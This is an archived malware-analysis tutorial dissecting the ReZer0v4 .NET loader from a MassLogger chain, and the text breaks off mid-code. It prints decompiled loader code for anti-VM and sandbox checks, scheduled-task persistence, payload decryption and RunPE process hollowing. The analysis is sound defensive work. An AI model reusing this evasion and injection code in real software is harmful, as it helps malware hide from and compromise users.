{
	"id": "e47a0f96-0522-4caf-a676-b5041f13a863",
	"created_at": "2026-04-06T00:09:00.97468Z",
	"updated_at": "2026-04-10T03:21:39.440089Z",
	"deleted_at": null,
	"sha1_hash": "4a094bb9a5df2b3ea137707ec57dba47cb565623",
	"title": "ReZer0v4 loader – Max Kersten",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 176243,
	"plain_text": "ReZer0v4 loader – Max Kersten\r\nArchived: 2026-04-05 21:10:52 UTC\r\nThis article was published on the 26th of August 2020. This article was updated on the 8th of December 2021.\r\nLoaders are used to conceal a payload from the prying eyes of analysts and anti-virus scanners alike. Using\r\nmultiple of them to load one another is a tactic that is quite commonly observed. This article will analyse the\r\nReZer0 loader in detail, which is one of the loaders that was used in the execution chain for this MassLogger\r\nsample. The stages prior to this loader were covered by Nikhil Hegde in a blog on ClamAV’s website.\r\nTable of contents\r\nTechnical sample information\r\nOutline\r\nObservations\r\nSample sanitation\r\nString obfuscation\r\nAnalysing the main function\r\nFollowing the loader’s execution flow\r\nAnalysing the rest of the loader\r\nFeature overview\r\nConclusion\r\nFinding more samples\r\nTechnical sample information\r\nThe sample can be downloaded from VirusBay, Malware Bazaar, or MalShare. The hashes are given below.\r\nMD5: 32b8a98b6b3db245201d0b91a8d0a200\r\nSHA-1: a9ee4ebe7c0d1071dba183287c2b5443b01af792\r\nSHA-256: 6d6224681c25a1b844d3cb183b6f852af8724c0cb25815aaf9e50ff00a6fddcf\r\nSize: 725504 bytes\r\nOutline\r\nThis article will show how to use de4dot to santise the names of classes, methods, and fields. After which it can be\r\nexported in Visual Studio to allow code refactoring. The string encryption is then analysed and removed, and the\r\nloader is analysed in detail. Note that the decryption routine is incorrectly placed due to the way it is coded,\r\nmeaning one can obtain the next stage without executing any of the system checks that the loader performs. At\r\nlast, further research into the usage of this loader in the wild is presented together with a rudimentary Yara rule.\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 1 of 27\n\nObservations\r\nThe sample does not fully execute in several sandboxes, meaning it likely contains anti-virtualisation and/or anti-sandbox capabilities.\r\nSample sanitation\r\nThe malware is a Dot Net binary, as was shown in the first few stages. Note that the binary is 32-bits, meaning one\r\nneeds to use the 32-bit version of dnSpy to be able to debug the binary. Upon opening the file, one can see the\r\nescaped unicode characters that are used in namespaces, classes, functions, and fields. Even though no obfuscator\r\nis found when using de4dot, the names within the binary are sanitised, making them more readable. Additionally,\r\nnot using de4dot results in an error when exporting the decompiled binary as a Visual Studio project. The exported\r\nproject can be used to refactor code, whilst dnSpy is used to debug the sample.\r\nString obfuscation\r\nThe strings in the loader are obfuscated. The function named smethod_0 in Class5 requires an integer as input,\r\nafter which it returns the deobfuscated string. The function is given below.\r\ninternal static string smethod_0(int int_3)\r\n{\r\nClass5.Class6 obj = Class5.class6_0;\r\nstring result;\r\nlock (obj)\r\n{\r\nstring text = Class5.class6_0.method_2(int_3);\r\nif (text != null)\r\n{\r\nresult = text;\r\n}\r\nelse\r\n{\r\nresult = Class5.smethod_1(int_3, true);\r\n}\r\n}\r\nreturn result;\r\n}\r\nWhen looking into the constructor of the used class, as well as the used methods, one will see that the obfuscation\r\nis rather lengthy. The code that dnSpy exported shows quite some errors when opening the project in Visual\r\nStudio. To obtain a list of all used integers for the deobfuscation method, one can select the function name in\r\ndnSpy and select Analyze from the right click context menu. Alternatively, one can use CTRL + SHIFT + R\r\ninstead of the context menu. The Used By list contains all references to this function. This list can be used to\r\ncreate a list of all used strings.\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 2 of 27\n\nAn easy way to avoid replicating the deobfuscation method, is to debug the sample with a breakpoint on the return\r\nstatement within the function. After that, one can set the next statement to the first line in the function, where the\r\nobj variable is initialised. This can be done by right clicking the target line and selecting Set Next Statement in\r\ndnSpy. Alternatively, one can use CTRL + SHIFT + F10 after the target line has been selected.\r\nWithin the debugger, one can change the value of int_3 to any of the integers that got collected in the previous\r\nstep. After changing the value of int_3, one can resume the execution, as the breakpoint on the return statement\r\nwill be hit once the deobfuscation is completed. The result variable will then contain the deobfuscated string’s\r\nvalue. Setting the next instruction at the top and providing the next integer value will provide the next string. A\r\ncomplete list of all integers and their deobfuscated strings is given below.\r\n-1511115605 \"QJAhqduYgl\"\r\n-1511115622 \"SXQYnw6FmN\"\r\n-1511115639 \"0||1||0||0||0||||||0||0||0||0||||||||||||||0||0||0||0||0||0||0||0||v4||0||2976||1||0|||\r\n-1511115749 \"||\"\r\n-1511115758 \"JyVNBfjFOm\"\r\n-1511116357 \"noKey\"\r\n-1511116538 \"Afx:400000:0\"\r\n-1511116392 \"SbieDll.dll\"\r\n-1511116410 \"USER\"\r\n-1511116293 \"SANDBOX\"\r\n-1511116307 \"VIRUS\"\r\n-1511116319 \"MALWARE\"\r\n-1511116333 \"SCHMIDTI\"\r\n-1511116348 \"CURRENTUSER\"\r\n-1511116494 @\"\\VIRUS\"\r\n-1511116507 \"SAMPLE\"\r\n-1511116520 @\"C:\\file.exe\"\r\n-1511116429 @\"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0\"\r\n-1511116640 \"Identifier\"\r\n-1511116657 \"VBOX\"\r\n-1511116668 @\"HARDWARE\\Description\\System\"\r\n-1511116574 \"SystemBiosVersion\"\r\n-1511116598 \"VideoBiosVersion\"\r\n-1511116749 \"VIRTUALBOX\"\r\n-1511116766 @\"SOFTWARE\\Oracle\\VirtualBox Guest Additions\"\r\n-1511116369 \"noValueButYesKey\"\r\n-1511116687 \"VMWARE\"\r\n-1511116700 @\"SOFTWARE\\VMware, Inc.\\VMware Tools\"\r\n-1511115845 @\"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0\"\r\n-1511115800 @\"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 2\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0\"\r\n-1511116011 @\"SYSTEM\\ControlSet001\\Services\\Disk\\Enum\"\r\n-1511115929 \"0\"\r\n-1511115937 \"vmware\"\r\n-1511115950 @\"SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\"\r\n-1511116035 \"DriverDesc\"\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 3 of 27\n\n-1511116052 @\"SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\Settings\r\n-1511116274 \"Device Description\"\r\n-1511116171 \"InstallPath\"\r\n-1511116189 @\"C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\\"\r\n-1511115337 \"kernel32.dll\"\r\n-1511115356 \"wine_get_unix_file_name\"\r\n-1511115386 \"QEMU\"\r\n-1511115269 @\"\\\\.\\ROOT\\cimv2\"\r\n-1511115290 \"SELECT * FROM Win32_VideoController\"\r\n-1511115460 \"Description\"\r\n-1511115478 \"VM Additions S3 Trio32/64\"\r\n-1511115510 \"S3 Trio32/64\"\r\n-1511115401 \"VirtualBox Graphics Adapter\"\r\n-1511115435 \"VMware SVGA II\"\r\n-1511115595 \"XML\"\r\n-1511114754 @\"\\\"\r\n-1511114762 \".exe\"\r\n-1511114773 \"MSBuild.exe\"\r\n-1511114791 \"vbc.exe\"\r\n-1511114805 \"RegSvcs.exe\"\r\n-1511115775 \"[LOCATION]\"\r\n-1511115664 \"[USERID]\"\r\n-1511115679 \"schtasks.exe\"\r\n-1511115698 @\"/Create /TN \"\"Updates\\\"\r\n-1511114830 \"\\\" /XML \\\"\"\r\n-1511114845 \"\\\"\"\r\n-1511114853 \"\\\"{path}\\\"\"\r\n-1511115456 \"ReZer0.Properties.Resources\"\r\n-1511114868 \"ToInt32\"\r\nWithin the Visual Studio project, one can replace all calls to the deobfuscation function with the deobfuscated\r\nstring. Note that the previously made assumption about the anti-virtualisation and anti-sandbox methods is\r\nconfirmed based on some of the strings in the list, such as but not limited to VMWARE, VIRTUALBOX, and\r\nwine_get_unix_file_name.\r\nAnalysing the main function\r\nThe execution of the program starts within the main function, the code of which is given below.\r\npublic static void Main()\r\n{\r\nstring location = Assembly.GetEntryAssembly().Location;\r\nif (Class8.int_11 == 1)\r\n{\r\nThread.Sleep(Conversions.ToInteger(Class8.string_2[35]) * 1000);\r\n}\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 4 of 27\n\nif (Class8.int_8 == 1)\r\n{\r\nClass8.smethod_0();\r\n}\r\nif (Class8.int_4 == 1 \u0026\u0026 Class2.smethod_2())\r\n{\r\nEnvironment.Exit(0);\r\n}\r\nif (Class8.int_5 == 1 \u0026\u0026 Class2.smethod_1(location))\r\n{\r\nEnvironment.Exit(0);\r\n}\r\nif (Class8.int_3 == 1)\r\n{\r\nClass8.smethod_5(Class8.string_5, Class8.string_4);\r\n}\r\nif (Class8.int_1 == 1)\r\n{\r\nstring str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @\r\nstring text = str + Class8.string_3 + \".exe\";\r\nif (!File.Exists(text))\r\n{\r\nFile.Copy(location, text);\r\nClass8.smethod_4(Class8.string_3, text);\r\n}\r\n}\r\nif (Class8.int_0 == 4)\r\n{\r\nClass8.smethod_8();\r\n}\r\nif (Class8.int_0 != 4)\r\n{\r\nClass8.smethod_9(Class8.int_0);\r\n}\r\n}\r\nAt first, the location of the loader is obtained. The eight following if-statements are executed when fields within\r\nClass8 contain a specific value. The Main function is also located in Class8. To understand how these fields are\r\npopulated, one can inspect the code of any of the integers, as can be seen in the example below.\r\nprivate static int int_4 = Conversions.ToInteger(Class8.string_2[7]);\r\nThe field string_2, which is a string array, contains all values that are needed. The initialisation of this variable,\r\nand its dependencies, is given below.\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 5 of 27\n\nprivate static string string_1 = \"0||1||0||0||0||||||0||0||0||0||||||||||||||0||0||0||0||0||0||0||0|\r\nprivate static string[] string_2 = Strings.Split(Class8.string_1, \"||\", -1, CompareMethod.Binary);\r\nFollowing the loader’s execution flow\r\nAs such, the string array is created by splitting the string, using the two pipes as the splitting character. As the\r\nvalues of all fields that are used in the main function are known, we can statically derive which if-statements are\r\nexecuted, and which are skipped. The code for the main function, with notes, is given below.\r\npublic static void Main()\r\n{\r\nstring location = Assembly.GetEntryAssembly().Location;\r\nif (Class8.int_11 == 1) //true\r\n{\r\nThread.Sleep(Conversions.ToInteger(Class8.string_2[35]) * 1000);\r\n}\r\nif (Class8.int_8 == 1) //false\r\n{\r\nClass8.smethod_0();\r\n}\r\nif (Class8.int_4 == 1 \u0026\u0026 Class2.smethod_2()) //int_4 == 0\r\n{\r\nEnvironment.Exit(0);\r\n}\r\nif (Class8.int_5 == 1 \u0026\u0026 Class2.smethod_1(location)) //int_5 == 0\r\n{\r\nEnvironment.Exit(0);\r\n}\r\nif (Class8.int_3 == 1) //int_3 == 0\r\n{\r\nClass8.smethod_5(Class8.string_5, Class8.string_4);\r\n}\r\nif (Class8.int_1 == 1) //true\r\n{\r\nstring str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @\r\nstring text = str + Class8.string_3 + \".exe\";\r\nif (!File.Exists(text))\r\n{\r\nFile.Copy(location, text);\r\nClass8.smethod_4(Class8.string_3, text);\r\n}\r\n}\r\nif (Class8.int_0 == 4) //false\r\n{\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 6 of 27\n\nClass8.smethod_8();\r\n}\r\nif (Class8.int_0 != 4) //true\r\n{\r\nClass8.smethod_9(Class8.int_0);\r\n}\r\n}\r\nNote that the value at the 35th index of string_2 is equal to 30, meaning that the time to sleep is 30 000\r\nmilliseconds, or 30 seconds. The variable named int_11 can therefore be renamed to shouldSleep, as it defines if\r\nthe sleep function should be called. Sleeping is often used to evade dynamic analysis environments such as\r\nsandboxes, as these generally monitor for activity and only run for a limited period of time.\r\nThe second if-statement will not be executed, meaning the analysis of that part is skipped for now. The third if-statement is set to be executed based on the settings, but also depends on the return value of Class2.smethod_2().\r\nWhen looking at that function, it mainly consists of function calls to Class2.smethod_0. To fully understand\r\nsmethod_2, one first has to analyse smethod_0. The code for smethod_0 from Class2 is given below.\r\npublic static string smethod_0(string string_0, string string_1)\r\n{\r\nRegistryKey registryKey = Registry.LocalMachine.OpenSubKey(string_0, false);\r\nstring result;\r\nif (registryKey == null)\r\n{\r\nresult = \"noKey\";\r\n}\r\nelse\r\n{\r\nobject objectValue = RuntimeHelpers.GetObjectValue(registryKey.GetValue(string_1, \"no\r\nif (objectValue.GetType() == typeof(string))\r\n{\r\nresult = objectValue.ToString();\r\n}\r\nelse if (registryKey.GetValueKind(string_1) == RegistryValueKind.String || registryKe\r\n{\r\nresult = objectValue.ToString();\r\n}\r\nelse if (registryKey.GetValueKind(string_1) == RegistryValueKind.DWord)\r\n{\r\nresult = Convert.ToString(Conversions.ToInteger(objectValue));\r\n}\r\nelse if (registryKey.GetValueKind(string_1) == RegistryValueKind.QWord)\r\n{\r\nresult = Convert.ToString(Conversions.ToLong(objectValue));\r\n}\r\nelse if (registryKey.GetValueKind(string_1) != RegistryValueKind.Binary)\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 7 of 27\n\n{\r\nresult = ((registryKey.GetValueKind(string_1) != RegistryValueKind.MultiStrin\r\n}\r\nelse\r\n{\r\nresult = Convert.ToString((byte[])objectValue);\r\n}\r\n}\r\nreturn result;\r\n}\r\nThis method is used to get a value from a given registry key. As such, the function can be renamed to\r\ngetRegistryKeyValue. The updated smethod_2 function is given below.\r\npublic static bool smethod_2()\r\n{\r\nbool result;\r\nif (Class2.getRegistryKeyValue(@\"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\L\r\n{\r\nresult = true;\r\n}\r\nelse if (Class2.getRegistryKeyValue(@\"HARDWARE\\Description\\System\", \"SystemBiosVersion\").ToUp\r\n{\r\nresult = true;\r\n}\r\nelse if (Class2.getRegistryKeyValue(@\"HARDWARE\\Description\\System\", \"VideoBiosVersion\").ToUpp\r\n{\r\nresult = true;\r\n}\r\nelse if (Operators.CompareString(Class2.getRegistryKeyValue(@\"SOFTWARE\\Oracle\\VirtualBox Gues\r\n{\r\nresult = true;\r\n}\r\nelse if (Class2.getRegistryKeyValue(@\"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target I\r\n{\r\nresult = true;\r\n}\r\nelse if (Operators.CompareString(Class2.getRegistryKeyValue(@\"SOFTWARE\\VMware, Inc.\\VMware To\r\n{\r\nresult = true;\r\n}\r\nelse if (Class2.getRegistryKeyValue(@\"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target I\r\n{\r\nresult = true;\r\n}\r\nelse if (Class2.getRegistryKeyValue(@\"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 2\\Scsi Bus 0\\Target I\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 8 of 27\n\n{\r\nresult = true;\r\n}\r\nelse if (Class2.getRegistryKeyValue(@\"SYSTEM\\ControlSet001\\Services\\Disk\\Enum\", \"0\").ToUpper\r\n{\r\nresult = true;\r\n}\r\nelse if (Class2.getRegistryKeyValue(@\"SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-\r\n{\r\nresult = true;\r\n}\r\nelse if (Class2.getRegistryKeyValue(@\"SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-\r\n{\r\nresult = true;\r\n}\r\nelse if (Class2.getRegistryKeyValue(@\"SOFTWARE\\VMware, Inc.\\VMware Tools\", \"InstallPath\").ToU\r\n{\r\nresult = true;\r\n}\r\nelse if (Class2.GetProcAddress(Class2.GetModuleHandle(\"kernel32.dll\"), \"wine_get_unix_file_na\r\n{\r\nresult = true;\r\n}\r\nelse if (Class2.getRegistryKeyValue(@\"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target I\r\n{\r\nresult = true;\r\n}\r\nelse if (!Class2.getRegistryKeyValue(@\"HARDWARE\\Description\\System\", \"SystemBiosVersion\").ToU\r\n{\r\nManagementScope scope = new ManagementScope(@\"\\\\.\\ROOT\\cimv2\");\r\nusing (ManagementObjectCollection managementObjectCollection = new ManagementObjectSe\r\n{\r\nforeach (ManagementBaseObject managementBaseObject in managementObjectCollect\r\n{\r\nManagementObject managementObject = (ManagementObject)managementBaseO\r\nif (Operators.CompareString(managementObject[\"Description\"].ToString\r\n{\r\nreturn true;\r\n}\r\nif (Operators.CompareString(managementObject[\"Description\"].ToString\r\n{\r\nreturn true;\r\n}\r\nif (Operators.CompareString(managementObject[\"Description\"].ToString\r\n{\r\nreturn true;\r\n}\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 9 of 27\n\nif (Operators.CompareString(managementObject[\"Description\"].ToString\r\n{\r\nreturn true;\r\n}\r\nif (managementObject[\"Description\"].ToString().ToUpper().Contains(\"VM\r\n{\r\nreturn true;\r\n}\r\nif (Operators.CompareString(managementObject[\"Description\"].ToString\r\n{\r\nreturn true;\r\n}\r\n}\r\n}\r\nresult = false;\r\n}\r\nelse\r\n{\r\nresult = true;\r\n}\r\nreturn result;\r\n}\r\nThis function checks for the presence of artifacts that are usually only present in virtual environments. As such,\r\nthe function can be renamed to detectVirtualEnvironment. The class can be renamed to AntiDetection. The updated\r\nif-statement is given below.\r\nif (Class8.int_4 == 1 \u0026\u0026 AntiDetection.detectVirtualEnvironment())\r\n{\r\nEnvironment.Exit(0);\r\n}\r\nIf this environment is found, the loader exists. If not, it moves on to the next reachable if-statement, which is sixth.\r\nif (Class8.int_1 == 1)\r\n{\r\nstring str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @\"\\\";\r\nstring text = str + Class8.string_3 + \".exe\";\r\nif (!File.Exists(text))\r\n{\r\nFile.Copy(location, text);\r\nClass8.smethod_4(Class8.string_3, text);\r\n}\r\n}\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 10 of 27\n\nThe str variable contains the path to the application data folder. The text variable contains the path to the\r\napplication data folder and the file name, including the extension. The file name is stored in the field named\r\nstring_3, which is equal to JyVNBfjFOm. If this file does not exist, the current loader is copied to the full path,\r\nafter which smethod_4 is executed with two arguments: the file name and the path to the file in the application\r\ndata folder. The code for the function is given below.\r\nprivate static void smethod_4(string string_8, string string_9)\r\n{\r\nstring text = Class4.smethod_3();\r\nstring name = WindowsIdentity.GetCurrent().Name;\r\nstring tempFileName = Path.GetTempFileName();\r\ntext = text.Replace(\"[LOCATION]\", string_9).Replace(\"[USERID]\", name);\r\nFile.WriteAllText(tempFileName, text);\r\nProcess.Start(new ProcessStartInfo(\"schtasks.exe\", string.Concat(new string[]\r\n{\r\n@\"/Create /TN \"\"Updates\\\"),\r\nstring_8,\r\n\"\\\" /XML \\\"\",\r\ntempFileName,\r\n\"\\\"\"\r\n}))\r\n{\r\nWindowStyle = ProcessWindowStyle.Hidden\r\n}).WaitForExit();\r\nFile.Delete(tempFileName);\r\n}\r\nA quick look inside Class4.smethod_3 shows that it obtains the embedded resources named XML. The full\r\nresource is given below.\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n \u003cRegistrationInfo\u003e\r\n \u003cDate\u003e2014-10-25T14:27:44.8929027\u003c/Date\u003e\r\n \u003cAuthor\u003e[USERID]\u003c/Author\u003e\r\n \u003c/RegistrationInfo\u003e\r\n \u003cTriggers\u003e\r\n \u003cLogonTrigger\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cUserId\u003e[USERID]\u003c/UserId\u003e\r\n \u003c/LogonTrigger\u003e\r\n \u003cRegistrationTrigger\u003e\r\n \u003cEnabled\u003efalse\u003c/Enabled\u003e\r\n \u003c/RegistrationTrigger\u003e\r\n \u003c/Triggers\u003e\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 11 of 27\n\n\u003cPrincipals\u003e\r\n \u003cPrincipal id=\"Author\"\u003e\r\n \u003cUserId\u003e[USERID]\u003c/UserId\u003e\r\n \u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n \u003cRunLevel\u003eLeastPrivilege\u003c/RunLevel\u003e\r\n \u003c/Principal\u003e\r\n \u003c/Principals\u003e\r\n \u003cSettings\u003e\r\n \u003cMultipleInstancesPolicy\u003eStopExisting\u003c/MultipleInstancesPolicy\u003e\r\n \u003cDisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n \u003cStopIfGoingOnBatteries\u003etrue\u003c/StopIfGoingOnBatteries\u003e\r\n \u003cAllowHardTerminate\u003efalse\u003c/AllowHardTerminate\u003e\r\n \u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n \u003cIdleSettings\u003e\r\n \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n \u003c/IdleSettings\u003e\r\n \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cHidden\u003efalse\u003c/Hidden\u003e\r\n \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n \u003cExecutionTimeLimit\u003ePT0S\u003c/ExecutionTimeLimit\u003e\r\n \u003cPriority\u003e7\u003c/Priority\u003e\r\n \u003c/Settings\u003e\r\n \u003cActions Context=\"Author\"\u003e\r\n \u003cExec\u003e\r\n \u003cCommand\u003e[LOCATION]\u003c/Command\u003e\r\n \u003c/Exec\u003e\r\n \u003c/Actions\u003e\r\n\u003c/Task\u003e\r\nThe function replaces two values within the XML to create a scheduled task which starts the loader upon startup.\r\nThe last if-statement that is executed is also the last one within the main function. The code is given below.\r\nif (Class8.int_0 != 4)\r\n{\r\nClass8.smethod_9(Class8.int_0);\r\n}\r\nNote that the value of int_0 equals 0. The code for smethod_9 is given below.\r\nprivate static void smethod_9(int int_13)\r\n{\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 12 of 27\n\nClass8.smethod_6(Class8.smethod_10(int_13), Class8.byte_0, true);\r\n}\r\nThe first argument for Class8.smethod_6 is equal to the return value of Class8.smethod_10, whose code is given\r\nbelow.\r\npublic static string smethod_10(int int_13)\r\n{\r\nstring result;\r\nswitch (int_13)\r\n{\r\ncase 0:\r\nresult = Assembly.GetEntryAssembly().Location;\r\nbreak;\r\ncase 1:\r\nresult = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), \"MSBuild.exe\");\r\nbreak;\r\ncase 2:\r\nresult = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), \"vbc.exe\");\r\nbreak;\r\ncase 3:\r\nresult = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), \"RegSvcs.exe\");\r\nbreak;\r\ndefault:\r\nresult = Assembly.GetEntryAssembly().Location;\r\nbreak;\r\n}\r\nreturn result;\r\n}\r\nThis function returns the path of a file, which is either an external file, or the path of the loader. In this case, the\r\nvalue 0 is passed to the function, which returns the location of the loader itself.\r\nThe byte array named byte_0, the second argument of Class8.smethod_6, is loaded when the loader starts, as can\r\nbe seen in the code below.\r\nprivate static string string_0 = \"QJAhqduYgl\";\r\nprivate static byte[] byte_0 = Class3.smethod_1(Class3.smethod_2(Class3.smethod_0(\"SXQYnw6FmN\"), Clas\r\nThe function named smethod_0 in Class3 is given below.\r\npublic static byte[] smethod_0(string string_0)\r\n{\r\nResourceManager resourceManager = new ResourceManager(string_0, Assembly.GetExecutingAssembly\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 13 of 27\n\nreturn (byte[])resourceManager.GetObject(string_0);\r\n}\r\nThis function returns an embedded resource based upon the given. As such, this method can be renamed to\r\ngetResourceByName. The code for Class3.smethod_2 is given below.\r\npublic static byte[] smethod_2(byte[] byte_0, string string_0)\r\n{\r\nint num = 0;\r\nbyte[] bytes = Encoding.BigEndianUnicode.GetBytes(string_0);\r\nchecked\r\n{\r\nint num2 = (int)(byte_0[byte_0.Length - 1] ^ 112);\r\nbyte[] array = new byte[byte_0.Length + 1];\r\nint num3 = byte_0.Length - 1;\r\nfor (int i = 0; i \u003c= num3; i++)\r\n{\r\narray[i] = (byte)((int)byte_0[i] ^ num2 ^ (int)bytes[num]);\r\nnum = ((num != string_0.Length - 1) ? (num + 1) : 0);\r\n}\r\nreturn (byte[])Utils.CopyArray(array, new byte[byte_0.Length - 2 + 1]);\r\n}\r\n}\r\nThis method alters the given resource based on the given string, which is the decryption key. The code for\r\nsmethod_1 is given below.\r\npublic static byte[] smethod_1(byte[] byte_0)\r\n{\r\nchecked\r\n{\r\nbyte[] array = new byte[byte_0.Length - 16 - 1 + 1];\r\nBuffer.BlockCopy(byte_0, 16, array, 0, array.Length);\r\nint num = array.Length - 1;\r\nfor (int i = 0; i \u003c= num; i++)\r\n{\r\nbyte[] array2 = array;\r\nint num2 = i;\r\narray2[num2] ^= byte_0[i % 16];\r\n}\r\nreturn array;\r\n}\r\n}\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 14 of 27\n\nThis method further alters the given byte array. When checking the decrypted value via the debugger, or by\r\nextracting the resource and creating a custom C# program, one can see that the first few bytes equal MZ, meaning\r\nthat the byte array contains an executable. Noteworthy here is the fact this payload is located in a static byte array.\r\nThis means that, even though the loader verifies wether the environment is safe to execute in, the byte array is\r\ndecrypted before any of the checks. If an AV were to scan the memory area of the byte array, the newly decrypted\r\nexecutable would be found. It is also possible to dump the array’s content via the debugger after breaking on the\r\ndeclaration of the array. This executable is the next stage, which is not analysed in this article.\r\nThe code for Class8.smethod_6 is given below.\r\npublic static bool smethod_6(string string_8, byte[] byte_1, bool bool_0)\r\n{\r\nbool result;\r\ntry\r\n{\r\nfor (int i = 1; i \u003c= 5; i++)\r\n{\r\nif (Class8.smethod_7(string_8, byte_1, bool_0))\r\n{\r\nreturn true;\r\n}\r\n}\r\nresult = false;\r\n}\r\ncatch\r\n{\r\nresult = false;\r\n}\r\nreturn result;\r\n}\r\nThis function loops five times, where it executes Class8.smethod_7 every time. The first argument is the full path\r\nto the loader, the second path is the next stage in the form of a byte array, and the third argument is a boolean that\r\nis set to true. This code looks similar to NYAN CAT‘s RunPE. Upon digging into smethod_7, the suspicion is\r\nconfirmed. The code is given below.\r\nprivate static bool smethod_7(string string_8, byte[] byte_1, bool bool_0)\r\n{\r\nint num = 0;\r\nstring string_9 = Class5.smethod_0(-1511114853);\r\nClass8.Struct2 @struct = default(Class8.Struct2);\r\nClass8.Struct1 struct2 = default(Class8.Struct1);\r\n@struct.uint_0 = Convert.ToUInt32(Marshal.SizeOf(typeof(Class8.Struct2)));\r\ntry\r\n{\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 15 of 27\n\nif (!Class8.CreateProcess(string_8, string_9, IntPtr.Zero, IntPtr.Zero, false, 4u, In\r\n{\r\nthrow new Exception();\r\n}\r\nMethodInfo method = typeof(BitConverter).GetMethod(Class5.smethod_0(-1511114868));\r\nobject[] parameters = new object[]\r\n{\r\nbyte_1,\r\n60\r\n};\r\nint num2 = Convert.ToInt32(method.Invoke(null, parameters));\r\nint num3 = BitConverter.ToInt32(byte_1, num2 + 26 + 26);\r\nint[] array = new int[179];\r\narray[0] = 65538;\r\nif (IntPtr.Size == 4)\r\n{\r\nif (!Class8.GetThreadContext(struct2.intptr_1, array))\r\n{\r\nthrow new Exception();\r\n}\r\n}\r\nelse if (!Class8.Wow64GetThreadContext(struct2.intptr_1, array))\r\n{\r\nthrow new Exception();\r\n}\r\nint num4 = array[41];\r\nint num5 = 0;\r\nif (!Class8.ReadProcessMemory(struct2.intptr_0, num4 + 4 + 4, ref num5, 4, ref num))\r\n{\r\nthrow new Exception();\r\n}\r\nif (num3 == num5 \u0026\u0026 Class8.NtUnmapViewOfSection(struct2.intptr_0, num5) != 0)\r\n{\r\nthrow new Exception();\r\n}\r\nint int_ = BitConverter.ToInt32(byte_1, num2 + 80);\r\nint int_2 = BitConverter.ToInt32(byte_1, num2 + 42 + 42);\r\nint num6 = Class8.VirtualAllocEx(struct2.intptr_0, num3, int_, 12288, 64);\r\nif (num6 == 0)\r\n{\r\nthrow new Exception();\r\n}\r\nif (!Class8.WriteProcessMemory(struct2.intptr_0, num6, byte_1, int_2, ref num))\r\n{\r\nthrow new Exception();\r\n}\r\nint num7 = num2 + 248;\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 16 of 27\n\nshort num8 = BitConverter.ToInt16(byte_1, num2 + 3 + 3);\r\nfor (int i = 0; i \u003c (int)num8; i++)\r\n{\r\nint num9 = BitConverter.ToInt32(byte_1, num7 